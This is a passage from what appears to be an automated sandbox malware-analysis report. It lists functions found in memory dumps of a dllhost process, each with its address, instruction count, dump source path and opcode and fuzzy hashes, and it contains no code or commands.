Instruction ID: 0f8732272376283aa5dc6abaeefe58bf87ced222fbd518bdc403985adc4436de
Opcode Fuzzy Hash: 2c58013ccfb200b41daf9a1edc6078871001e1e5e21a67e0cf7e90d946539e78
Instruction Fuzzy Hash: 94C04C74A06144CBDB44AFF4811829D76A5AB45344F90452D5506A7395EA791A14CB41

Function 04BC03AF Relevance: 1.3, Strings: 1, Instructions: 7COMMON

Download Yara Rule

Strings

h, xrefs: 04BC03C4

Memory Dump Source

Source File: 00000002.00000002.3876929822.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID: h
API String ID: 0-2439710439
Opcode ID: d2c6f3ab30845855260c5c301be710f7609ce10de30f0f3689a511c38a4b1aad
Instruction ID: 205c096ee8d423e67985689aa6165c58bb205ac7c30a6ac0472dab3901208914
Opcode Fuzzy Hash: d2c6f3ab30845855260c5c301be710f7609ce10de30f0f3689a511c38a4b1aad
Instruction Fuzzy Hash: 5BC04C74B05248CBDF84AFF485582AC76A5AF45305F90462D5406A7395EF7918149F41

Function 04BC0340 Relevance: 1.3, Strings: 1, Instructions: 7COMMON

Download Yara Rule

Strings

6, xrefs: 04BC0358

Memory Dump Source

Source File: 00000002.00000002.3876929822.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID: 6
API String ID: 0-498629140
Opcode ID: 89af35d49cf22ecd300ba4b9f0bb3668fca0abc8c0975ba92a58a29bbad9336a
Instruction ID: 93b3d8620cbe09f8e630a691ef864eae68f77306b80120112e6e94650a0d9237
Opcode Fuzzy Hash: 89af35d49cf22ecd300ba4b9f0bb3668fca0abc8c0975ba92a58a29bbad9336a
Instruction Fuzzy Hash: 7AC08C30A02104CBDB80AFF0801839C76E0AB02300F808459800EA63A0EE3809048B41

Function 04BC6170 Relevance: .3, Instructions: 265COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3876929822.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7068183cfbe5d0acab8f41269214b444fa5e1e774e532c67aaa4fe5a3ba16857
Instruction ID: 9b7bd13083370b30eeeaae4f57b6496826ead5df35db64fe989a9c136388e191
Opcode Fuzzy Hash: 7068183cfbe5d0acab8f41269214b444fa5e1e774e532c67aaa4fe5a3ba16857
Instruction Fuzzy Hash: 92917F35F04214CBEB149BA8C5D4BAC73A1AB8A314F5545FEDC0AE7290FA34AC41D7A6

Function 04BC4C28 Relevance: .3, Instructions: 263COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3876929822.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fdd8be25f7c11a5ca30b0fec58d487c26a19c8bff5a9c19afd88ff51648aee88
Instruction ID: a3e8ddf0cb48aed648d6a0b9081216d02d6d7499c614e7e965bdd98d7f89d6d6
Opcode Fuzzy Hash: fdd8be25f7c11a5ca30b0fec58d487c26a19c8bff5a9c19afd88ff51648aee88
Instruction Fuzzy Hash: 1FA1B434F002509BDB05ABB8D8A476D77B2AF85305F1449BED806EB3A8EE35BD41CB51

Function 04BC5135 Relevance: .2, Instructions: 231COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3876929822.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 94fd30bdc6a6af49179b393f8c5fdadbd488d857cf13ec2566dead61852bfaf9
Instruction ID: 3dff03d30be8ea5649d754d21baa6431d917c263a28b984595fb7d132d2ed684
Opcode Fuzzy Hash: 94fd30bdc6a6af49179b393f8c5fdadbd488d857cf13ec2566dead61852bfaf9
Instruction Fuzzy Hash: CE819334B002109FDB54EBB8D8A866D77A2BF89345F54497AD807E73A8EE71BC01CB51

Function 04BC5CEA Relevance: .2, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3876929822.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8af195b1eea5b031339d0288acf2145d1c0e6315b7a7aa0016034152767a8291
Instruction ID: 8cae83d56f13c21065c31f983a8c6345cff66f4865e43bce992495e11920ba08
Opcode Fuzzy Hash: 8af195b1eea5b031339d0288acf2145d1c0e6315b7a7aa0016034152767a8291
Instruction Fuzzy Hash: BD819634F04224EBEB249F74C498BAC7BA2AF45324F0585BDD816BB390EE357C419752

Function 0485E90B Relevance: .2, Instructions: 213COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3876536408.000000000485C000.00000040.00000800.00020000.00000000.sdmp, Offset: 0485C000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_485c000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a577aba72d44e4105ba01dca5a8016ea6b5c61bdf8f6a13a041f1e783033c760
Instruction ID: c333481e5bd157937cbe455f21b8d9a85830380ab04f944149275ad58949f33f
Opcode Fuzzy Hash: a577aba72d44e4105ba01dca5a8016ea6b5c61bdf8f6a13a041f1e783033c760
Instruction Fuzzy Hash: 3EB19378A00618CFDB64EF64DC587ADBBB2FB49301F1085AAD90AA7365DB705E80CF51

Function 0485E954 Relevance: .2, Instructions: 203COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3876536408.000000000485C000.00000040.00000800.00020000.00000000.sdmp, Offset: 0485C000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_485c000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8c92714838510c189d440943c2867f03af58ea63be74a47963474f79caf6affb
Instruction ID: 7de422a021d0c796db373aeca91d37404fd989f08956c4e26ce2b6a32496607d
Opcode Fuzzy Hash: 8c92714838510c189d440943c2867f03af58ea63be74a47963474f79caf6affb
Instruction Fuzzy Hash: F7A1A378A00618CFDB64EF64DC587ADBBB2FB49301F1085A9D90AA6365DB706E80CF51

Function 04BC5D19 Relevance: .2, Instructions: 195COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3876929822.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c4db7c8064653ebc2fad2644b913aef7ae752d5d247c9a3c68c229d3ce11c5a
Instruction ID: 8bc8f6019c572c4b17121f1d02f82b7722f3fba46496a9c2fa5bae5d8d99f3d5
Opcode Fuzzy Hash: 6c4db7c8064653ebc2fad2644b913aef7ae752d5d247c9a3c68c229d3ce11c5a
Instruction Fuzzy Hash: 32618330F04224EBEB249F64C498BAD77A2BF85324F0584BDD816BB390EE757C41A752

Function 04BC4350 Relevance: .2, Instructions: 194COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3876929822.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3f8760ae5b0c626e694e195d7e5941f18112503d6275aea2ec9401ab034d6f7a
Instruction ID: b9f33d09a6e0fc161cabd88d5c4e008d7b2661a60f80ee6d079b08304d523002
Opcode Fuzzy Hash: 3f8760ae5b0c626e694e195d7e5941f18112503d6275aea2ec9401ab034d6f7a
Instruction Fuzzy Hash: 1F61A275F00115CBDB009B72D8A57ACB7A1BB85320F0549BAE806A7254FB34AE50CB96

Function 04BC5215 Relevance: .2, Instructions: 186COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3876929822.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f1dad42046c41388dfd69eac40dd7944c3e7cb4c2a956723b27a242a2c1564a1
Instruction ID: f0a823878047a32782f049401fe5317bfdb8e6a6d14e49e72ea6c1b24d2a2979
Opcode Fuzzy Hash: f1dad42046c41388dfd69eac40dd7944c3e7cb4c2a956723b27a242a2c1564a1
Instruction Fuzzy Hash: BF619034B002109BDB14FBB8D4A866D77B2AF85345F50497ED806EB3A8EE71BD41CB51

Function 04BC4DCD Relevance: .2, Instructions: 181COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3876929822.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 18e9dd7b355892f05abba7858f0b2513ec24abd4b8df7cc42f70c1bed296e117
Instruction ID: b59fbd97b1bf929eb755a0aed98099b0f3b26c293d8ac78bd2c5413c5789e5d8
Opcode Fuzzy Hash: 18e9dd7b355892f05abba7858f0b2513ec24abd4b8df7cc42f70c1bed296e117
Instruction Fuzzy Hash: 86616134F006149BDB14AFB8D4A866D77B2AF85305F10497AD806EB3A8EE71BD41CB51

Function 04BC4E89 Relevance: .2, Instructions: 179COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3876929822.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2ca8f165f223923c56daa72ce8f1dbfaa00b4417d2148b326620f9b48d16a85e
Instruction ID: aaabee8140ffdb793fab171869fec731b44234c4e389d21df811db1c2c6c2f7e
Opcode Fuzzy Hash: 2ca8f165f223923c56daa72ce8f1dbfaa00b4417d2148b326620f9b48d16a85e
Instruction Fuzzy Hash: B4618034B002109BDB14EBB8D4A866D77B2AF85345F5049BED806EB3A8EE71BD41CB51

Function 04BC4E2F Relevance: .2, Instructions: 179COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3876929822.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b3d0b22a6f2ad8ebf83e3339816010e0683d4124c7d635957281279c6813c57b
Instruction ID: 56bcecc84377be6c38df5007a430da92ccf541a8a2ef56bc52ef842fce7ba261
Opcode Fuzzy Hash: b3d0b22a6f2ad8ebf83e3339816010e0683d4124c7d635957281279c6813c57b
Instruction Fuzzy Hash: 92618234F002109BDB14AFB8D4A866D77B2AF85345F50497ED806EB3A8EE71BD41CB51

Function 04BC4F19 Relevance: .2, Instructions: 179COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3876929822.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d1aa564c31dff39462af61018a7d7a9fbee6ba6b810757c6fe0164c0af488da5
Instruction ID: 802f8154ec0ca8eaa328fb4f51931954d6a8a8fb5db293aebf3f94662be1600f
Opcode Fuzzy Hash: d1aa564c31dff39462af61018a7d7a9fbee6ba6b810757c6fe0164c0af488da5
Instruction Fuzzy Hash: 73618134B002109BDB14ABB8D8A866D77B2AF85345F50497ED806EB3A8EE71BD41CB51

Function 04BC526C Relevance: .2, Instructions: 177COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3876929822.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f90846c0692fb3f276f5737962f6bea3853897f855016f7e3b120f23fdc7852d
Instruction ID: a9885eba9097a92e7ac1d15baac60320789091edbf1d108b27295887180b6bf2
Opcode Fuzzy Hash: f90846c0692fb3f276f5737962f6bea3853897f855016f7e3b120f23fdc7852d
Instruction Fuzzy Hash: 9C617034B00210DBDB14ABB8D8A876D77A2EF85345F5049BED806DB3A8EE71BD41CB51

Function 04BC50EA Relevance: .2, Instructions: 176COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3876929822.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 75e7f3a517d613aed0622720ec877ee927acf31ee1991837aed9de85c52c6889
Instruction ID: 4cfeaa3c49d33eb668d0ff9fc79a3ca62178c1495147040229f313d706449213
Opcode Fuzzy Hash: 75e7f3a517d613aed0622720ec877ee927acf31ee1991837aed9de85c52c6889
Instruction Fuzzy Hash: DF618034B002109BDB14ABB8D4A866D77B2AF85345F50497ED806EB3A8EE71BD41CB51

Function 04BC4340 Relevance: .2, Instructions: 168COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3876929822.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: db7eb84da4588816f1dfd35284ef00c663089ee9020bb9a2a0ba48760cea1960
Instruction ID: 339e6307f4c6bbbbf05357a503cfc78e66c3d9c684cdc7b093fb904a927e98a6
Opcode Fuzzy Hash: db7eb84da4588816f1dfd35284ef00c663089ee9020bb9a2a0ba48760cea1960
Instruction Fuzzy Hash: E951B175F00115CBDB009B76D8E53ACB7B1BF85310F0549BAE806EB254EB34AE51CB96

Function 04BC4C5C Relevance: .2, Instructions: 167COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3876929822.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f26c0c913aae087f8d746f4cc2d1c326c9068df701a494247685df8ad3312804
Instruction ID: b1cbdbd624f4fa52a69bc4b7081effeedcc9633e2cb853c20471072c2d45f250
Opcode Fuzzy Hash: f26c0c913aae087f8d746f4cc2d1c326c9068df701a494247685df8ad3312804
Instruction Fuzzy Hash: 7D516E34B00214DBDB14EBB8D8A866D77B2AF85345F1049BED806DB3A8EE31BD41CB51

Function 04BC1D3E Relevance: .2, Instructions: 161COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3876929822.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e23473a1297f5905d70baa35c5e127e12e0a3159ec2911c9155f14cdf5501aa7
Instruction ID: 64adf6fd909ff7ca8e823c31878ce55e66539194983c483e3646c71512f68649
Opcode Fuzzy Hash: e23473a1297f5905d70baa35c5e127e12e0a3159ec2911c9155f14cdf5501aa7
Instruction Fuzzy Hash: 1B710A78A00218CFEB54EF68D8987ADB7B1FB49304F1045A9D90AE7365DB706E80CF51

Function 04BC6E8C Relevance: .1, Instructions: 127COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3876929822.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7da1a74ab305c6021f7f8d1bf6ecf13e307f95256ee6c23985b03a0b9f3cf997
Instruction ID: 56bfdb41369569ec2485037121ab1a6e3b265e6af5ba4fc2160e3724cb70b969
Opcode Fuzzy Hash: 7da1a74ab305c6021f7f8d1bf6ecf13e307f95256ee6c23985b03a0b9f3cf997
Instruction Fuzzy Hash: 77418E34E04115DBEB04DBA8D894FAE7BB1FB45304F1449AAE906E73A0EB346D41DB92

Function 04BC6EDD Relevance: .1, Instructions: 117COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3876929822.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8646c746439ccd0cc997fd48de59419713b8e2934e80123f331d017671dd264
Instruction ID: ed99a1b449af261b3f69db850b8bc640150571aaf5a102d82213ca07d711ba59
Opcode Fuzzy Hash: d8646c746439ccd0cc997fd48de59419713b8e2934e80123f331d017671dd264
Instruction Fuzzy Hash: 58416034E04115DBEB04EBA8D894BAE77B2FF84304F1445AAE906E73A0DB306D41DB92

Function 04BC6E80 Relevance: .1, Instructions: 111COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3876929822.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e4be9657e81334567d7f7cea6cc778402ec04f17aa55834b98e4b1e27092cbc
Instruction ID: fab2a50416a8bd6e62ff3a255030b2fe311d8e1746c8a2ee45929a1d698715f3
Opcode Fuzzy Hash: 3e4be9657e81334567d7f7cea6cc778402ec04f17aa55834b98e4b1e27092cbc
Instruction Fuzzy Hash: 75414F34E04119DBEB04DBA4D894FAEBBB2FF44304F1445AAE806A73A0DB356D41DB91

Function 04BC668C Relevance: .1, Instructions: 108COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3876929822.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c7886810f404fdd861d6bd27d4ed21e49aabeb019d4a69bdf10e2cc765a3c7e1
Instruction ID: d883f812b5ff561e3b5b4cd69aded375f161f63009bb6c0c0b4543286c0a70f1
Opcode Fuzzy Hash: c7886810f404fdd861d6bd27d4ed21e49aabeb019d4a69bdf10e2cc765a3c7e1
Instruction Fuzzy Hash: 1F41CA75F44208DBCB04EB74D585BADB7B2FB84310F0449BBE906EB291FA35AC409B52

Function 04BC0E4D Relevance: .1, Instructions: 104COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3876929822.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fbdba4657e6a5bfd605a5a859d5431925fa3513a69d6ad017c8ae2716bd0d54f
Instruction ID: 9cc33bd01bb05ad5f5ffbd654aea93281be1e6da9563c1e6dfbbb76e84e691fe
Opcode Fuzzy Hash: fbdba4657e6a5bfd605a5a859d5431925fa3513a69d6ad017c8ae2716bd0d54f
Instruction Fuzzy Hash: 83411B74A01214CFEB64EF68D8987ED7BB1BF49301F1045A9A909E7365DB306E80CF11

Function 04BC0EE6 Relevance: .1, Instructions: 97COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3876929822.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 51b84465d03450f06d55b648970015ce568dc5cc16577a53d43737b7c7b6ab7d
Instruction ID: a980186cd738ffb4824b8350baa55414cdfe0551bc420863c7c361da3cacbcef
Opcode Fuzzy Hash: 51b84465d03450f06d55b648970015ce568dc5cc16577a53d43737b7c7b6ab7d
Instruction Fuzzy Hash: EA410B78A01218CFEB54EF68D89879D77B1BF89304F5049A9A90AE7364DF706E80CF51

Function 04BC1D17 Relevance: .1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3876929822.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e9046f5aa8e0dc29b95631308fb08883b1938a38b6392098ad7e90b0fe1dd027
Instruction ID: 83efffea9afb0536cef98681ff3cea0615544ce435e583a1fe2c389cefbdfb5b
Opcode Fuzzy Hash: e9046f5aa8e0dc29b95631308fb08883b1938a38b6392098ad7e90b0fe1dd027
Instruction Fuzzy Hash: 39410A78A00214CFEB54EF68D8987AD77B1BF49304F1045A9A90AE73A4DF706E80CF11

Function 0485EB98 Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3876536408.000000000485C000.00000040.00000800.00020000.00000000.sdmp, Offset: 0485C000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_485c000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a758240d95a66ac738a271cb83b9f06a94b55e4f62ecd8fdb9b1cb16bdd99850
Instruction ID: f8c9c0a17bded5b014c3556c99c72235e7569c99a97b999d2e22675f1c5fd507
Opcode Fuzzy Hash: a758240d95a66ac738a271cb83b9f06a94b55e4f62ecd8fdb9b1cb16bdd99850
Instruction Fuzzy Hash: 1B419378A00618CFDB54EF24DD986ADBBB2FF49301F5045A9E90AE6365DB306E80CF51

Function 04BC28BB Relevance: .1, Instructions: 94COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3876929822.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1334ac44f8721bd8480dd4fda375c08750e53bc4d85eaf668afbb4ba6fe56950
Instruction ID: b212c6a8b1362772d7027f0bacf1ea857cc6161f1c522352f27a859e613454ca
Opcode Fuzzy Hash: 1334ac44f8721bd8480dd4fda375c08750e53bc4d85eaf668afbb4ba6fe56950
Instruction Fuzzy Hash: 14311739F00214CFDB14DFB4C8986ADB7F6BF89311F0585A9D85AAB390DA74AC41CB51

Function 04BC0FFB Relevance: .1, Instructions: 90COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3876929822.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fe99bcb2a6779175c03a20f49f6a37315524f811273764eb0a188d698a6547e5
Instruction ID: 515f07f6cc341aabfb5a2c43d658fe725337b689cd9f4d2217fcd8d3cc785441
Opcode Fuzzy Hash: fe99bcb2a6779175c03a20f49f6a37315524f811273764eb0a188d698a6547e5
Instruction Fuzzy Hash: 08411B78A00214CFEB54EF68D8987AD77B1BB89304F1045A9A90EE73A4DF702E80CF51

Function 04BC70C8 Relevance: .1, Instructions: 89COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3876929822.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ce9f2827c998aa078dfa4846ef79129b2fa4b10be63e149e6f23a2bb9758b7ef
Instruction ID: 99fb0d74029deabdbaa5bf10690e8414287464e3713a4569f8f0e5b3dc64c73f
Opcode Fuzzy Hash: ce9f2827c998aa078dfa4846ef79129b2fa4b10be63e149e6f23a2bb9758b7ef
Instruction Fuzzy Hash: 0521BA76E006058BEB00BBB4DC842AE77E6EB85214F0505BDD901E7250EE747D158FA2

Function 04BC3006 Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3876929822.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e76785d907997cbcb43d2f26826be46a81076206c9492ae9d575bf14e3730bd8
Instruction ID: 30cc7fb0f6e3ea9b7bb05828828dcbdf8de4c59b7b9031fec5c0480c1e7c4722
Opcode Fuzzy Hash: e76785d907997cbcb43d2f26826be46a81076206c9492ae9d575bf14e3730bd8
Instruction Fuzzy Hash: 4B315C35F00224CBEB189BB4C8983AD76F2BF44351F4985A9E846E7390DA78AC41CB51

Function 04BC5379 Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3876929822.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a0d6ab5118b39cb59964b2ec25e087edaa1e690e13a8242619945a3cdb0acea8
Instruction ID: c446c5d6fe15e2cb97e367d2ccb53902f4d50d9de34c3bb21c0487dd58c7a183
Opcode Fuzzy Hash: a0d6ab5118b39cb59964b2ec25e087edaa1e690e13a8242619945a3cdb0acea8
Instruction Fuzzy Hash: AC318234B04174DBEB24EBACC49465DB3E2FF84305F544969D606DB358EBB0BC418B56

Function 04BC2B98 Relevance: .1, Instructions: 84COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3876929822.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e5febfd82db3ca600da501e6698e1138c28e295de95f5dc3ae672b8816a8ce31
Instruction ID: 17e4d3a0e0d1df370d4c0e4c1b19c274e732a9112dc47f245fe25e56f1422c10
Opcode Fuzzy Hash: e5febfd82db3ca600da501e6698e1138c28e295de95f5dc3ae672b8816a8ce31
Instruction Fuzzy Hash: 3B216B35F002248BDB18ABB5D8583AD36F6BF85351F4481B9E846E73E0EE789C44CB61

Function 04BC5B40 Relevance: .1, Instructions: 84COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3876929822.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 588df45e9b442cdcca89a045717fad6d6ece052924ea5b2b15f6104131df3896
Instruction ID: bce6312cb0051956852d149938b1b0b671b86f5d00c67076ae785314c1bf1ed6
Opcode Fuzzy Hash: 588df45e9b442cdcca89a045717fad6d6ece052924ea5b2b15f6104131df3896
Instruction Fuzzy Hash: 59212975B48264EAFB206F7C8C803AE6E96DB84214F0505BAEE01D7291EAA5B9414293

Function 04BC2F5C Relevance: .1, Instructions: 83COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3876929822.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 125ef86bdaf1b8bce4c2418b366406cce92b6fc9889a8a4ca6669e920c64f8da
Instruction ID: ebc8851dd5b8797dd44709afa06806a4cfeb4adfda629af50654f78761dc210c
Opcode Fuzzy Hash: 125ef86bdaf1b8bce4c2418b366406cce92b6fc9889a8a4ca6669e920c64f8da
Instruction Fuzzy Hash: 4B215E35F002248BEB189BB5D8583AD36F6BF45351F4481B9D846E73D4EE789C41C761

Function 04BC2889 Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3876929822.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cfe075b3ab167a3702773160332efc0221a593e952f16ea217a303caf497ecc1
